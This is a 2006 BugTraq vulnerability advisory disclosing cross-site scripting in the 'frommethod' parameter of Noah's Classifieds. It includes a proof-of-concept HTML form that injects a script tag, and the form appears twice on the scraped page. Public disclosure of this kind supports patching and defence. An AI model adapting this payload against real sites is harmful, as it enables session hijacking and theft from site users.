BugTraq
Back to list
|
Post reply
Noah's Classifieds Cross Site Scripting Vulnerability
Oct 10 2006 10:47PM
raphael huck free fr
Noah's Classifieds is prone to a Cross Site Scripting Vulnerability, due to a failure in the application to properly sanitize the "frommethod" POST parameter in "index.php" :
<html>
<body>
<form method="POST" enctype="multipart/form-data" action="http://www.example.com/classifieds/index.php">
<input type="hidden" name="fromlist" value="advertisement">
<input type="hidden" name="frommethod" value="'><script>alert('XSS Vulnerable');</script>"
<input type="submit" value="Cancel" name="submit" class="button">
</form>
</body>
</html>
Advisory: http://zone14.free.fr/advisories/5/
--Raphael HUCK
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
<html>
<body>
<form method="POST" enctype="multipart/form-data" action="http://www.example.com/classifieds/index.php">
<input type="hidden" name="fromlist" value="advertisement">
<input type="hidden" name="frommethod" value="'><script>alert('XSS Vulnerable');</script>"
<input type="submit" value="Cancel" name="submit" class="button">
</form>
</body>
</html>
Advisory: http://zone14.free.fr/advisories/5/
--Raphael HUCK
[ reply ]